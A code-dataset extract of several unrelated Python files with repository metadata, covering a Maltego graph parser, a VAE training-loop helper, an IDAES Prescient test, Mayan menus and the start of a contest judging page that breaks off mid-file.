# the majority of our repositories:
return os.getenv("DEFAULT_BRANCH", "master")
| 42.628272
| 100
| 0.637497
|
5655dffda485a47712f676825c0040e67df59ae3
| 548
|
py
|
Python
|
algobattle/team.py
|
ImogenBits/algobattle
|
321b8a5b2ea9c92cb5c28fc2110aa41dbe25a4bb
|
[
"MIT"
] | null | null | null |
algobattle/team.py
|
ImogenBits/algobattle
|
321b8a5b2ea9c92cb5c28fc2110aa41dbe25a4bb
|
[
"MIT"
] | null | null | null |
algobattle/team.py
|
ImogenBits/algobattle
|
321b8a5b2ea9c92cb5c28fc2110aa41dbe25a4bb
|
[
"MIT"
] | null | null | null |
"""Team class, stores necessary information about a Team, such as their associated solver and generator."""
class Team:
"""Team class responsible for holding basic information of a specific team."""
def __init__(self, team_name: str, generator_path: str, solver_path: str) -> None:
self.name = str(team_name).replace(' ', '_').lower() # Lower case needed for docker tag created from name
self.generator_path = generator_path
self.solver_path = solver_path
def __str__(self) -> str:
return self.name
| 39.142857
| 114
| 0.693431
|
aef3d8e90034b2de628ff8516fec2f0184e98dcf
| 557
|
py
|
Python
|
selfdrive/pandad.py
|
jeroenbbb/openpilot
|
4a2ff784f85ac87a4aa9ba8a345c2403102f960a
|
[
"MIT"
] | null | null | null |
selfdrive/pandad.py
|
jeroenbbb/openpilot
|
4a2ff784f85ac87a4aa9ba8a345c2403102f960a
|
[
"MIT"
] | null | null | null |
selfdrive/pandad.py
|
jeroenbbb/openpilot
|
4a2ff784f85ac87a4aa9ba8a345c2403102f960a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# simple boardd wrapper that updates the panda first
import os
from panda import ensure_st_up_to_date
from common.params import Params
params = Params()
is_panda_absent = params.get("IsPandaAbsent").decode() == '1'
def main(gctx=None):
if is_panda_absent:
print ("No Panda available")
else:
ensure_st_up_to_date()
#print ("Launch boardd")
#os.chdir("boardd")
#os.execvp("./boardd", ["./boardd"])
# launch of boardd is now done in manager, this is not the right place
if __name__ == "__main__":
main()
| 20.62963
| 72
| 0.696589
|
32a2db7be723b3cd4f22eb0473031ce51cba2ccf
| 771
|
py
|
Python
|
mayan/apps/common/menus.py
|
eshbeata/open-paperless
|
6b9ed1f21908116ad2795b3785b2dbd66713d66e
|
[
"Apache-2.0"
] | 2,743
|
2017-12-18T07:12:30.000Z
|
2022-03-27T17:21:25.000Z
|
mayan/apps/common/menus.py
|
eshbeata/open-paperless
|
6b9ed1f21908116ad2795b3785b2dbd66713d66e
|
[
"Apache-2.0"
] | 15
|
2017-12-18T14:58:07.000Z
|
2021-03-01T20:05:05.000Z
|
mayan/apps/common/menus.py
|
eshbeata/open-paperless
|
6b9ed1f21908116ad2795b3785b2dbd66713d66e
|
[
"Apache-2.0"
] | 257
|
2017-12-18T03:12:58.000Z
|
2022-03-25T08:59:10.000Z
|
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from navigation import Menu
__all__ = (
'menu_about', 'menu_facet', 'menu_object', 'menu_main', 'menu_multi_item',
'menu_secondary', 'menu_setup', 'menu_sidebar', 'menu_tools', 'menu_user'
)
menu_about = Menu(icon='fa fa-info', label=_('System'), name='about menu')
menu_facet = Menu(name='object facet')
menu_object = Menu(name='object menu')
menu_main = Menu(name='main menu')
menu_multi_item = Menu(name='multi item menu')
menu_secondary = Menu(name='secondary menu')
menu_setup = Menu(name='setup menu')
menu_sidebar = Menu(name='sidebar menu')
menu_tools = Menu(name='tools menu')
menu_user = Menu(
icon='fa fa-user', name='user menu', label=_('User')
)
| 32.125
| 78
| 0.728923
|
a40c5bdbd63322a83293504d8c9a9b6ec79923d8
| 3,472
|
py
|
Python
|
idaes/tests/prescient/test_prescient.py
|
CATER-UCF/idaes-pse
|
afccbd43e56dc39d63542b4d400ac027b0ccbe84
|
[
"RSA-MD"
] | null | null | null |
idaes/tests/prescient/test_prescient.py
|
CATER-UCF/idaes-pse
|
afccbd43e56dc39d63542b4d400ac027b0ccbe84
|
[
"RSA-MD"
] | null | null | null |
idaes/tests/prescient/test_prescient.py
|
CATER-UCF/idaes-pse
|
afccbd43e56dc39d63542b4d400ac027b0ccbe84
|
[
"RSA-MD"
] | 1
|
2022-03-17T11:08:43.000Z
|
2022-03-17T11:08:43.000Z
|
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
import importlib
from numbers import Number
from pathlib import Path
from typing import Dict, Union, List
import pytest
import pandas as pd
prescient_simulator = pytest.importorskip("prescient.simulator", reason="prescient (optional dependency) not available")
@pytest.fixture(scope="module")
def base_dir() -> Path:
pkg_init_path = Path(importlib.util.find_spec("idaes.tests.prescient").origin)
return pkg_init_path.parent
# define custom type for type hinting
PrescientOptions = Dict[str, Union[str, bool, Number, dict]]
class Test5Bus:
"Simple test using 5bus use case"
@pytest.fixture
def data_path(self, base_dir: Path) -> Path:
return base_dir / "5bus"
@pytest.mark.unit
def test_data_path_available(self, data_path: Path):
assert data_path.is_dir()
@pytest.fixture
def output_dir(self, tmp_path: Path) -> Path:
path = tmp_path / "5bus_output"
path.mkdir()
return path
@pytest.fixture
def prescient_options(self, data_path: Path, output_dir: Path) -> PrescientOptions:
return {
"data_path": str(data_path),
"input_format":"rts-gmlc",
"simulate_out_of_sample":True,
"run_sced_with_persistent_forecast_errors":True,
"output_directory": str(output_dir),
"start_date":"07-10-2020",
"num_days":2,
"sced_horizon":1,
"ruc_mipgap":0.01,
"reserve_factor":0.1,
"deterministic_ruc_solver":"cbc",
"deterministic_ruc_solver_options":{"feas":"off", "DivingF":"on",},
"sced_solver":"cbc",
"sced_frequency_minutes":60,
"ruc_horizon":36,
"compute_market_settlements":True,
"monitor_all_contingencies":False,
"output_solver_logs":False,
"price_threshold":1000,
"contingency_price_threshold":100,
"reserve_price_threshold":5,
}
@pytest.fixture
def run_simulator(self, prescient_options: PrescientOptions) -> None:
from prescient.simulator import Prescient
sim = Prescient()
sim.simulate(**prescient_options)
@pytest.fixture
def simulation_results_table(
self,
run_simulator,
output_dir: Path,
name: str = "overall_simulation_output.csv"
) -> pd.DataFrame:
path = output_dir / name
return pd.read_csv(path)
@pytest.mark.component
# TODO use a more specific test to validate simulation output
def test_simulation_results(self, simulation_results_table: pd.DataFrame):
assert not simulation_results_table.empty
| 34.376238
| 120
| 0.639977
|
ce4b9dfe18ec4fdea20f817d5e1055495c9feb28
| 4,566
|
py
|
Python
|
mtgx2nx/parser.py
|
Woniuke/mtgx2nx
|
141b28d0ae3b7c748a83a0ead187245b21058dd2
|
[
"MIT"
] | null | null | null |
mtgx2nx/parser.py
|
Woniuke/mtgx2nx
|
141b28d0ae3b7c748a83a0ead187245b21058dd2
|
[
"MIT"
] | null | null | null |
mtgx2nx/parser.py
|
Woniuke/mtgx2nx
|
141b28d0ae3b7c748a83a0ead187245b21058dd2
|
[
"MIT"
] | null | null | null |
import os
import xml.etree.cElementTree as ElementTree
import zipfile
import networkx as nx
class Maltego:
def __init__(self, file_path):
self.entities = dict()
self.graph = list()
self.mtgx_info = dict()
self.__parser_mtgx(file_path)
def __get_entity(self, xml_entity):
name = xml_entity.attrib['id']
entity = {
'attrib': xml_entity.attrib,
'fields': list()
}
for field in xml_entity.find('Properties').find('Fields'):
field_info = field.attrib.copy()
default_value = field.find('DefaultValue')
if default_value:
field_info['default_value'] = default_value.text
sample_value = field.find('SampleValue')
if sample_value:
field_info['sample_value'] = sample_value.text
entity['fields'].append(field_info)
self.entities[name] = entity
@staticmethod
def __get_graph(xml_entity):
def parser_node(node_xml):
mtg_ns = 'http://maltego.paterva.com/xml/mtgx'
node_id = node_xml.attrib['id']
node = dict()
for data in node_xml:
maltego_entity = data.find(f'{{{mtg_ns}}}MaltegoEntity')
if maltego_entity:
node['maltego_entity_type'] = maltego_entity.attrib['type']
for field in maltego_entity.find(f'{{{mtg_ns}}}Properties'):
name = field.attrib['name']
node[name] = field.find(f'{{{mtg_ns}}}Value').text
break
else:
continue
return node_id, node
def parser_edge(edge_xml):
mtg_ns = 'http://maltego.paterva.com/xml/mtgx'
source = edge_xml.attrib['source']
target = edge_xml.attrib['target']
edge = dict()
for data in edge_xml:
maltego_entity = data.find(f'{{{mtg_ns}}}MaltegoLink')
if maltego_entity:
edge['type'] = maltego_entity.attrib['type']
for field in maltego_entity.find(f'{{{mtg_ns}}}Properties'):
name = field.attrib['name']
edge[name] = field.find(f'{{{mtg_ns}}}Value').text
break
else:
continue
return source, target, edge
graph_ns = 'http://graphml.graphdrawing.org/xmlns'
graph = xml_entity.find(f'{{{graph_ns}}}graph')
if 'edgedefault' in graph.attrib:
graph_type = graph.attrib['edgedefault']
else:
graph_type = 'directed'
if graph_type == 'directed':
nx_graph = nx.MultiDiGraph()
else:
nx_graph = nx.MultiGraph()
nodes = graph.findall(f'{{{graph_ns}}}node')
edges = graph.findall(f'{{{graph_ns}}}edge')
nx_graph.add_nodes_from(list(map(parser_node, nodes)))
nx_graph.add_edges_from(list(map(parser_edge, edges)))
return nx_graph
@staticmethod
def __get_properties_info(version_file):
info = dict()
for line in version_file.splitlines():
if line[0] != '#':
k, v = line.split('=')
info[k] = v
return info
def __parser_mtgx(self, file_path):
zip_handler = zipfile.ZipFile(file_path)
for file in zip_handler.filelist:
filename = file.filename
if filename == 'version.properties':
self.mtgx_info.update(self.__get_properties_info(zip_handler.read(filename).decode('utf-8')))
elif filename[:6] == 'Graphs':
name = os.path.split(filename)[-1]
fname, ext = os.path.splitext(name)
if ext == '.graphml':
properties = self.__get_properties_info(
zip_handler.read(f'Graphs/{fname}.properties').decode('utf-8'))
graph = self.__get_graph(
ElementTree.fromstring(zip_handler.read(f'Graphs/{fname}.graphml').decode('utf-8'))
)
self.graph.append({
'properties': properties,
'graph': graph
})
elif filename[:8] == 'Entities':
self.__get_entity(
ElementTree.fromstring(zip_handler.read(filename).decode('utf-8'))
)
else:
continue
| 37.735537
| 109
| 0.52869
|
47b040316a076b263c5d5179d85a8b2a22bc7133
| 21,389
|
py
|
Python
|
vae/loop_tools.py
|
kiwi0fruit/jats-semi-supervised-pytorch
|
67e9bb85f09f8ef02e17e495784d1d9a71c3adec
|
[
"MIT"
] | null | null | null |
vae/loop_tools.py
|
kiwi0fruit/jats-semi-supervised-pytorch
|
67e9bb85f09f8ef02e17e495784d1d9a71c3adec
|
[
"MIT"
] | null | null | null |
vae/loop_tools.py
|
kiwi0fruit/jats-semi-supervised-pytorch
|
67e9bb85f09f8ef02e17e495784d1d9a71c3adec
|
[
"MIT"
] | null | null | null |
from typing import Union, Tuple, Dict, List, Iterator, Any, Iterable, Callable, Optional as Opt
from dataclasses import dataclass, asdict
from abc import abstractmethod
from os import path
import math
# noinspection PyPep8Naming
from numpy import ndarray as Array
import torch as tr
from torch import Tensor
from torch.optim.optimizer import Optimizer
from torch.nn import Module
from kiwi_bugfix_typechecker import test_assert
from semi_supervised_typed.inference import DeterministicWarmup
from .display import Log
DO_EXCEPTIONS = ('id', 'len', 'start', 'end')
IntArg = Union[int, List[int]]
FloatArg = Union[float, List[float]]
StrArg = Union[str, List[str]]
TupleIntArg = Union[Tuple[int, ...], List[Tuple[int, ...]]]
test_assert()
class OutputChecker:
# noinspection PyMethodMayBeStatic,PyUnusedLocal
def check(self, guide: Any) -> bool: # pylint: disable=unused-argument,no-self-use
return True
@dataclass
class Consts:
α: float
β: float
γ: float
δ: float
ε: float
η: float
λ: float
μ: float
ρ: float
τ: float
ω: float
@dataclass
class ConstsIterators:
α: Iterator[float]
β: Iterator[float]
γ: Iterator[float]
δ: Iterator[float]
ε: Iterator[float]
η: Iterator[float]
λ: Iterator[float]
μ: Iterator[float]
ρ: Iterator[float]
τ: Iterator[float]
ω: Iterator[float]
def get_consts(self):
return Consts(α=next(self.α), β=next(self.β), γ=next(self.γ), δ=next(self.δ), ε=next(self.ε), η=next(self.η),
λ=next(self.λ), μ=next(self.μ), ρ=next(self.ρ), τ=next(self.τ), ω=next(self.ω))
@dataclass
class Do:
"""
Single value should not be a list.
List given would always mean series of values.
Non-list values (even tuples) would be converted to [value].
"""
id: int = -1
epochs: IntArg = 40
batch_size: IntArg = 64
iters_per_epoch: IntArg = -1
len: int = 1
formula: StrArg = ''
anneal_epochs: IntArg = 0
start: Opt[int] = None
end: Opt[int] = None
α0: Opt[FloatArg] = None
α: FloatArg = 1
β0: Opt[FloatArg] = None
β: FloatArg = 1
γ0: Opt[FloatArg] = None
γ: FloatArg = 1
δ0: Opt[FloatArg] = None
δ: FloatArg = 1
ε0: Opt[FloatArg] = None
ε: FloatArg = 1
η0: Opt[FloatArg] = None
η: FloatArg = 1
λ0: Opt[FloatArg] = None
λ: FloatArg = 1
μ0: Opt[FloatArg] = None
μ: FloatArg = 1
ρ0: Opt[FloatArg] = None
ρ: FloatArg = 1
τ0: Opt[FloatArg] = None
τ: FloatArg = 1
ω0: Opt[FloatArg] = None
ω: FloatArg = 1
max_failure: IntArg = 15
basis_strip: TupleIntArg = ()
post_load: bool = False
model_load_skip: Tuple[str, ...] = ()
optimizer_load_skip: Tuple[str, ...] = ()
def __post_init__(self):
if self.α0 is None:
self.α0 = self.α
if self.β0 is None:
self.β0 = self.β
if self.γ0 is None:
self.γ0 = self.γ
if self.δ0 is None:
self.δ0 = self.δ
if self.ε0 is None:
self.ε0 = self.ε
if self.η0 is None:
self.η0 = self.η
if self.λ0 is None:
self.λ0 = self.λ
if self.μ0 is None:
self.μ0 = self.μ
if self.ρ0 is None:
self.ρ0 = self.ρ
if self.τ0 is None:
self.τ0 = self.τ
if self.ω0 is None:
self.ω0 = self.ω
assert self.id >= 0
if isinstance(self.iters_per_epoch, list):
assert sum(int(it <= 0) for it in self.iters_per_epoch) == 0
else:
assert self.iters_per_epoch > 0
@staticmethod
def int_(x: IntArg) -> int:
if isinstance(x, int):
return x
raise RuntimeError("Presumably Guide.get_spec(...) wasn't run.")
@staticmethod
def float_(x: Opt[FloatArg]) -> float:
if isinstance(x, (float, int)):
return x
raise RuntimeError("Presumably Guide.get_spec(...) wasn't run.")
def get_iterators(self) -> ConstsIterators:
nt, flt = self.int_, self.float_
n = nt(self.anneal_epochs) * nt(self.iters_per_epoch)
return ConstsIterators(
α=DeterministicWarmup(n=n, t_start=flt(self.α0), t_end=flt(self.α)),
β=DeterministicWarmup(n=n, t_start=flt(self.β0), t_end=flt(self.β)),
γ=DeterministicWarmup(n=n, t_start=flt(self.γ0), t_end=flt(self.γ)),
δ=DeterministicWarmup(n=n, t_start=flt(self.δ0), t_end=flt(self.δ)),
ε=DeterministicWarmup(n=n, t_start=flt(self.ε0), t_end=flt(self.ε)),
η=DeterministicWarmup(n=n, t_start=flt(self.η0), t_end=flt(self.η)),
λ=DeterministicWarmup(n=n, t_start=flt(self.λ0), t_end=flt(self.λ)),
μ=DeterministicWarmup(n=n, t_start=flt(self.μ0), t_end=flt(self.μ)),
ρ=DeterministicWarmup(n=n, t_start=flt(self.ρ0), t_end=flt(self.ρ)),
τ=DeterministicWarmup(n=n, t_start=flt(self.τ0), t_end=flt(self.τ)),
ω=DeterministicWarmup(n=n, t_start=flt(self.ω0), t_end=flt(self.ω)),
)
class Guide:
""" context kwarg should be provides as context=Guide.ctx(...) """
id_pref: str
models_idxs: Tuple[int, ...]
successful_models_n: int
to_do: Tuple[int, ...]
do_specs: Dict[int, Do]
successful_models: List[int]
dtype: tr.dtype
device: tr.device
model: Module
optimizer: Optimizer
print_every_epoch: int
glb_spec: Dict[str, Any]
log_stats: List[Dict[str, Any]]
_train: bool
logger: Log
output_checker: OutputChecker
epoch: int
iteration: int
context: Dict[str, Any]
_get_loader: Tuple[Callable[[Do], Iterable]]
_get_model: Tuple[Callable[[Do, Opt[Module]], Opt[Module]]]
_get_optimizer: Tuple[Callable[[Do, Module], Opt[Optimizer]]]
batch_size: int = -1
last_consts: Consts
_total_losses: Dict[str, float] = {'loss': 0.}
def __init__(self, get_model: Callable[[Do, Opt[Module]], Opt[Module]],
get_optimizer: Callable[[Do, Module], Opt[Optimizer]],
get_loader: Callable[[Do], Iterable], id_pref: Union[str, int], models_idxs: Tuple[int, ...],
successful_models_n: int, to_do: Tuple[int, ...], do_specs: Tuple[Do, ...], logger: Log,
glb_spec: Dict[str, Any], context: Dict[str, Any],
output_checker: OutputChecker=OutputChecker(), dtype: tr.dtype=tr.float,
device: tr.device=tr.device('cuda') if tr.cuda.is_available() else tr.device('cpu'),
print_every_epoch: int=10, train: bool=True):
""" context kwarg should be provides as context=Guide.ctx(...) """
self.id_pref = str(id_pref)
self.models_idxs = models_idxs
self.successful_models_n = successful_models_n
self.to_do = to_do
if len(set(do.id for do in do_specs)) != len(do_specs):
raise ValueError
self.do_specs = {do.id: self.all_lists(do) for do in do_specs}
self._train = train
self.successful_models = []
self.logger = logger
self.dtype = dtype
self.device = device
self.print_every_epoch = print_every_epoch
self.glb_spec = glb_spec
self.log_stats = []
self.output_checker = output_checker
self.epoch = 0
self.iteration = 0
self.context = context
self._get_loader = (get_loader,)
self._get_model = (get_model,)
self._get_optimizer = (get_optimizer,)
self.__post_init__()
@staticmethod
def ctx() -> Dict[str, Any]:
""" ctx method doesn't hold Liskov substitution principle """
return dict()
def __post_init__(self) -> None:
pass
def modify_model_pre_load(self) -> None:
pass
def set_model(self, spec: Do) -> None:
get_model = self._get_model[0]
if spec.post_load:
model = get_model(spec, self.model)
if model is not None:
self.model = model.to(device=self.device, dtype=self.dtype)
return
model = get_model(spec, None)
assert model is not None
self.model = model
self.modify_model_pre_load()
self.model = self.model.to(device=self.device, dtype=self.dtype)
def set_optimizer(self, spec: Do) -> None:
get_optimizer = self._get_optimizer[0]
optimizer = get_optimizer(spec, self.model)
if spec.post_load and (optimizer is None):
return
assert optimizer is not None
self.optimizer = optimizer
@abstractmethod
def step(self, spec: Do, item: Any, consts: Consts) -> Tuple[Tensor, Dict[str, float], bool]:
"""
Method that is called from train loop inside ``self.train`` per iteration.
It should return loss scalar to backpropagate (``loss.backward()``) and dict of other losses of interest.
:return: loss (or None if to skip iteration), dict, skip
"""
raise NotImplementedError
@abstractmethod
def print(self, epoch: int, iteration: int, spec: Do, item: Any, consts: Consts, losses: Dict[str, float]) -> None:
""" This function is called from ``self.train`` with ``with tr.no_grad():`` context
when ``self.print_every_epoch`` is satisfied. """
raise NotImplementedError
@abstractmethod
def save_model_output(self, spec: Do, epoch: int, run_id: str) -> None:
""" Method that is called with ``with tr.no_grad():`` context after successful model train.
It can be overridden to save needed results. """
raise NotImplementedError
@staticmethod
def all_lists(do: Do) -> Do:
kwargs: dict = asdict(do)
for k, v in kwargs.items():
if not (k in DO_EXCEPTIONS) and not isinstance(v, list):
kwargs[k] = [v]
# noinspection PyArgumentList
return type(do)(**kwargs)
def get_spec(self, do_id: int, i: int) -> Do:
do = self.do_specs[do_id]
kwargs: dict = asdict(do)
for k, v in kwargs.items():
if not (k in DO_EXCEPTIONS):
kwargs[k] = v[min(i, len(v) - 1)]
# noinspection PyArgumentList
spec = type(do)(**kwargs)
return spec
@staticmethod
def mean_losses(total_losses: Dict[str, float], batches: int) -> Dict[str, float]:
denominator = dict(_max=1, _min=1)
return {k: v / denominator.get(k[-4:], batches) for k, v in total_losses.items()}
def train_step(self, spec: Do, item: Any, consts: Consts) -> Tuple[Dict[str, float], bool]:
loss, losses_i, skip = self.step(spec=spec, item=item, consts=consts)
if skip:
return losses_i, skip
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
return losses_i, skip
def train(self, spec: Do, epoch_0: int, iteration_0: int) -> Tuple[int, int, Dict[str, float]]:
"""
If fresh model then ``iteration_0 == -1``.
:return: (epoch, iteration, save_dict)
"""
consts_iterators = spec.get_iterators()
iteration, printed_epoch = iteration_0, -1
losses: Dict[str, float]
epoch, losses, batches = epoch_0, dict(), 0 # for type checker
item_last_good: Any = None
for epoch in range(epoch_0 + 1, epoch_0 + 1 + spec.int_(spec.epochs)):
self.model.train()
losses, batches = dict(), 0
item: Any = None
get_loader = self._get_loader[0]
for item in get_loader(spec):
consts = consts_iterators.get_consts()
losses_i, skip = self.train_step(spec=spec, item=item, consts=consts)
if skip:
continue
for k, v in losses_i.items():
if k.endswith('_max'):
v0 = losses.get(k, -math.inf)
losses[k] = max(v0, v)
elif k.endswith('_min'):
v0 = losses.get(k, math.inf)
losses[k] = min(v0, v)
else:
v0 = losses.get(k, 0.)
losses[k] = v0 + v
batches += 1
iteration += 1
if iteration == iteration_0 + 1:
with tr.no_grad():
self.print(epoch=epoch, iteration=iteration, spec=spec, item=item, consts=consts,
losses=dict())
item_last_good = item
if item is None:
raise RuntimeError('Empty DataLoader')
if epoch % self.print_every_epoch == 0:
# noinspection PyUnboundLocalVariable
consts = consts
with tr.no_grad():
self.print(epoch=epoch, iteration=iteration, spec=spec, item=item_last_good, consts=consts,
losses=self.mean_losses(losses, batches))
printed_epoch = epoch
if epoch == epoch_0:
raise RuntimeError('No epochs')
# noinspection PyUnboundLocalVariable
consts = consts
if printed_epoch != epoch:
with tr.no_grad():
self.print(epoch=epoch, iteration=iteration, spec=spec, item=item_last_good, consts=consts,
losses=self.mean_losses(losses, batches))
self.last_consts = consts
return epoch, iteration, self.mean_losses(losses, batches)
def set_output_checker(self, output_checker: OutputChecker):
self.output_checker = output_checker
def tensor(self, x: Union[Array, Tensor], dtype: tr.dtype=None, device: tr.device=None,
requires_grad: bool=None, non_blocking: bool=None) -> Tensor:
"""
Uses default or doesn't change values except for ``dtype`` and ``device``
that use ``self.dtype`` and ``self.device`` as defaults.
"""
device = device if (device is not None) else self.device
dtype = dtype if (dtype is not None) else self.dtype
if isinstance(x, Tensor):
ret = x.to(device=device, dtype=dtype)
elif isinstance(x, Array):
ret = tr.tensor(x, dtype=dtype, device=device)
else:
raise TypeError
if non_blocking is not None:
ret = ret.to(non_blocking=non_blocking)
if requires_grad is not None:
ret.requires_grad = requires_grad
return ret
def load_model(self, spec: Do) -> None: # pylint: disable=unused-argument
"""
If you override this method you can more flexibly load the model.
Like changing ``self.model`` before or after loading.
* If ``optimizer_load_skip=('RESET',)`` kwarg is set then optimizer doesn't load.
* If ``optimizer_load_skip=`` kwarg is set to non empty str then optimizer merges loaded into defaults
(skipping empty string '' names).
* Same is for loading model.
>>> '''
>>> class Guide1(Guide):
>>> def load_model(self, spec: Do):
>>> # do something to the self.model before loading it
>>> super(Guide1, self).load_model(spec)
>>> # do something to the self.model after loading it:
>>> del self.model.qz_flow
>>> '''
"""
assert isinstance(spec.batch_size, int)
self.batch_size = spec.batch_size
checkpoint = self.logger.checkpoint()
spec.post_load = False
self.set_model(spec)
self.set_optimizer(spec)
self.epoch, self.iteration, self.log_stats = 0, -1, []
if path.isfile(checkpoint):
_checkpoint = tr.load(checkpoint)
model_state_dict_default = self.model.state_dict()
model_state_dict_loaded: Dict = _checkpoint['model_state_dict']
if spec.model_load_skip == ('RESET',):
model_state_dict_loaded = model_state_dict_default
elif spec.model_load_skip:
model_state_dict_upd = model_state_dict_loaded
for key in spec.model_load_skip:
if key != '':
del model_state_dict_upd[key]
model_state_dict_loaded = model_state_dict_default
model_state_dict_loaded.update(model_state_dict_upd)
optimizer_state_dict_default = self.optimizer.state_dict()
optimizer_state_dict_loaded: Dict = _checkpoint['optimizer_state_dict']
if spec.optimizer_load_skip == ('RESET',):
optimizer_state_dict_loaded = optimizer_state_dict_default
elif spec.optimizer_load_skip:
optimizer_state_dict_upd = optimizer_state_dict_loaded
for key in spec.optimizer_load_skip:
if key != '':
del optimizer_state_dict_upd[key]
optimizer_state_dict_loaded = optimizer_state_dict_default
optimizer_state_dict_loaded.update(optimizer_state_dict_upd)
self.model.load_state_dict(model_state_dict_loaded)
try:
self.optimizer.load_state_dict(optimizer_state_dict_loaded)
except ValueError:
self.optimizer.load_state_dict(optimizer_state_dict_default)
self.model.eval()
self.epoch = _checkpoint.get('epoch', self.epoch)
self.iteration = _checkpoint.get('iteration', self.iteration)
self.log_stats = _checkpoint.get('log_stats', self.log_stats)
if not (isinstance(self.log_stats, list)
and isinstance(self.epoch, int) and isinstance(self.iteration, int)):
raise RuntimeError('Loaded log_stats should be a list, epoch and iteration should be int.')
spec.post_load = True
self.set_model(spec)
self.set_optimizer(spec)
spec.post_load = False
# noinspection PyMethodMayBeStatic
def do_post_train(self, spec: Do) -> None:
pass
def run_guide(self):
for model_idx in self.models_idxs:
run_id = f'{self.id_pref}-{model_idx}'
for do_id in self.to_do:
do = self.do_specs[do_id]
double_break = False
for i in list(range(do.len))[do.start:do.end]:
spec = self.get_spec(do_id=do_id, i=i)
assert isinstance(spec.max_failure, int)
for _ in range(abs(int(spec.max_failure)) + 1):
self.logger.set_run_id(run_id)
self.load_model(spec=spec)
if self._train:
self.epoch, self.iteration, self._total_losses = self.train(
spec=spec, epoch_0=self.epoch, iteration_0=self.iteration)
self.do_post_train(spec=spec)
success = self.output_checker.check(guide=self)
if success:
save_dict = dict(
model_state_dict=self.model.state_dict(),
optimizer_state_dict=self.optimizer.state_dict(),
epoch=self.epoch,
iteration=self.iteration,
log_stats=self.log_stats,
do_spec=asdict(spec),
dtype=repr(self.dtype),
device=repr(self.device),
total_losses=self._total_losses,
glb_spec=self.glb_spec,
)
tr.save(save_dict, self.logger.checkpoint())
tr.save(save_dict, self.logger.checkpoint(epoch=self.epoch))
break
else:
break
else:
double_break = True
break
with tr.no_grad():
self.save_model_output(spec=spec, epoch=self.epoch, run_id=run_id)
if double_break:
break
else:
self.successful_models.append(model_idx)
if len(self.successful_models) >= self.successful_models_n:
break
def save(self):
do_id = self.to_do[-1]
do = self.do_specs[do_id]
spec = self.get_spec(do_id=do_id, i=list(range(do.len))[do.start:do.end][-1])
save_dict = dict(
model_state_dict=self.model.state_dict(),
optimizer_state_dict=self.optimizer.state_dict(),
epoch=self.epoch,
iteration=self.iteration,
log_stats=self.log_stats,
do_spec=asdict(spec),
dtype=repr(self.dtype),
device=repr(self.device),
total_losses=self._total_losses,
glb_spec=self.glb_spec,
)
self.logger.set_run_id(f'{self.id_pref}-{self.models_idxs[-1]}')
tr.save(save_dict, self.logger.checkpoint())
tr.save(save_dict, self.logger.checkpoint(epoch=self.epoch))
| 38.748188
| 119
| 0.574781
|
f34e76f77f83ef0b0586ee4ed3d19be9a20d4cd4
| 6,988
|
py
|
Python
|
src/main/generator/pages/judge.py
|
zrev2220/open-contest
|
5dbb383a19b8ff4dfe5bdcf18379cb8aa13b47b9
|
[
"Apache-2.0"
] | null | null | null |
src/main/generator/pages/judge.py
|
zrev2220/open-contest
|
5dbb383a19b8ff4dfe5bdcf18379cb8aa13b47b9
|
[
"Apache-2.0"
] | null | null | null |
src/main/generator/pages/judge.py
|
zrev2220/open-contest
|
5dbb383a19b8ff4dfe5bdcf18379cb8aa13b47b9
|
[
"Apache-2.0"
] | null | null | null |
from code.util import register
from code.util.db import Contest, Problem, Submission
from code.generator.lib.htmllib import *
from code.generator.lib.page import *
import logging
from datetime import datetime
class ProblemTab(UIElement):
def __init__(self, x):
num, prob = x
self.html = h.li(
h.a(prob.title, href=f"#tabs-{num}")
)
icons = {
"ok": "check",
"wrong_answer": "times",
"tle": "clock",
"runtime_error": "exclamation-triangle",
"presentation_error": "times",
"extra_output": "times",
"incomplete_output" : "times",
"reject" : "times",
"pending": "sync"
}
verdict_name = {
"ok": "Accepted",
"wrong_answer": "Wrong Answer",
"tle": "Time Limit Exceeded",
"runtime_error": "Runtime Error",
"presentation_error": "Presentation Error",
"extra_output": "Extra Output",
"incomplete_output": "Incomplete Output",
"reject": "Submission Rejected",
"pending": "Pending..."
}
def resultOptions(result):
ans = []
for res in verdict_name:
if result == res:
ans.append(h.option(verdict_name[res], value=res, selected="selected"))
else:
ans.append(h.option(verdict_name[res], value=res))
return ans
class TestCaseTab(UIElement):
def __init__(self, x, sub):
num, result = x
self.html = h.li(
h.a(href=f"#tabs-{sub.id}-{num}", contents=[
h.i(cls=f"fa fa-{icons[result]}", title=f"{verdict_name[result]}"),
f"Sample #{num}"
])
)
class TestCaseData(UIElement):
def __init__(self, x, sub):
num, input, output, error, answer = x
self.html = div(id=f"tabs-{sub.id}-{num}", contents=[
div(cls="row", contents=[
div(cls="col-12", contents=[
h.h4("Input"),
h.code(input.replace(" ", " ").replace("\n", "<br/>"))
])
]),
div(cls="row", contents=[
div(cls="col-6", contents=[
h.h4("Output"),
h.code(output.replace(" ", " ").replace("\n", "<br/>"))
]),
div(cls="col-6", contents=[
h.h4("Correct Answer"),
h.code(answer.replace(" ", " ").replace("\n", "<br/>"))
])
]),
div(cls="row", contents=[
div(cls="col-12", contents=[
h.h4("Diff"),
h.em("Insertions are in <span style=color:darkgreen;background-color:palegreen>green</span>, deletions are in <span style=color:darkred;background-color:#F6B0B0>red</span>"),
h.code(id=f"diff-{sub.id}-{num}", contents=[
h.script(f"document.getElementById('diff-{sub.id}-{num}').innerHTML = getDiff(`{output.rstrip()}`, `{answer.rstrip()}`)")
])
])
])
])
class SubmissionCard(UIElement):
def __init__(self, submission: Submission):
subTime = submission.timestamp
probName = submission.problem.title
cls = "red" if submission.result != "ok" else ""
self.html = div(cls="modal-content", contents=[
div(cls=f"modal-header {cls}", contents=[
h.h5(
f"Submission to {probName} at ",
h.span(subTime, cls="time-format")
),
"""
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">×</span>
</button>"""
]),
div(cls="modal-body", contents=[
